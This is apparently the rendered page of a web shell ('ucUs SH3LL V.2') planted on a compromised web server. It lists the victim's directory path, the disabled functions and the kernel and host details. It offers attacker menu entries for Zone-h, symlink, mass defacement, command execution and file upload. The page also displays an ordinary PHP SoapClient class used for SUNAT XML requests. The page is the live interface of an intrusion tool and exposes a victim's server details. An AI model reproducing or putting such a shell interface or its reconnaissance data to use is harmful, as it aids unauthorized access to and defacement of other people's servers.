Comming ucUs SH3LL V.2

Path : /home/gujo45me/public_html/farfans/sunat/librerias/feedsoap/
Disable Functions : exec,passthru,shell_exec,system
System : Linux server-604606.appsiete.com 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64

[ Home ][ Zone-h ][ Jumping ][ Symlink ][ Mass Depes ][ Command ]

File Upload :
Current File : /home/gujo45me/public_html/farfans/sunat/librerias/feedsoap/feedSoap.php

<?php
    class feedSoap extends SoapClient{

        public $XMLStr = "";

        public function setXMLStr($value)
        {
            $this->XMLStr = $value;
        }

        public function getXMLStr()
        {
            return $this->XMLStr;
        }

        public function __doRequest($request, $location, $action, $version, $one_way = 0)
        {
            $request = $this->XMLStr;

            $dom = new DOMDocument('1.0');

            try
            {
                $dom->loadXML($request);
            } catch (DOMException $e) {
                die($e->code);
            }

            $request = $dom->saveXML();

            //Solicitud
            return parent::__doRequest($request, $location, $action, $version, $one_way = 0);
        }

        public function SoapClientCall($SOAPXML)
        {
            return $this->setXMLStr($SOAPXML);
        }
    }

Copyright © 2019 | Powered By MecUs7